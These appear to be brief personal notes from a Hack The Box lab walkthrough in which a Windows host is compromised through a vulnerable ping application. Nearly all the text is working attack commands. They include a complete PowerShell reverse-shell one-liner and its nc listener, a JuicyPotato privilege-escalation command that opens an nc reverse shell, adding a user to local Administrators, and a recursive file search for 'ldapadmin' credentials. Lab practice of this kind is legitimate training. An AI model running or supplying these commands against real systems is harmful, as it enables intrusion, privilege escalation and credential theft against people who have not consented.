P1

Exploit the ping app:

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.15.37',4444);$stream
 = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = 
$stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object 
-TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback =
 (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + 
(pwd).Path + '> ';$sendbyte = 
([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

nc -lnvp 4444

For convenience, I then downloaded and executed a meterpreter on the host.

Then:

.\\JuicyPotato.exe -l 6666 -p C:\\Windows\\system32\\cmd.exe -a "/c C:\\Windows\\Temp\\test\\nc.exe 10.10.15.37 8443 -e cmd" -t * -c {8BC3F05E-D86B-11D0-A075-00C04FB68820}

One of the CLSID that works for Win10 (many don’t)

Then I can add the htb-student non privileged user to admins:

net localgroup Administrators htb-student /add

Then connect via RDP.

powershell -Command "Get-ChildItem -Path C:\\Users\\ -Recurse -File | Select-String -Pattern 'ldapadmin'"